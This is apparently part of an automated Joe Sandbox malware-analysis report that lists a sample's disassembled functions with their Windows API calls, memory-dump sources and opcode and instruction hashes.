                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00435278
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00435288
                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 00435298
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 680241177-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00402DD0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3409977793-1684325040
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9bcf86f15823f24245d2df24eaf2d0b1add52508d906022a273d18f5af470a83
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e560479fc27c02defff92632e7fe9eb64bdceab8888f0f2f0c7111a6ba657ffa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADE1AB755082028BC710EF21C54566BB7A9AF84708F90493FF485772E2D77CEA8A879F
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @EXITCODE
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 580348202-3436989551
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock_file_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 26237723-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                                                                                                                                                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 717694121-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1706434739-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1706434739-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
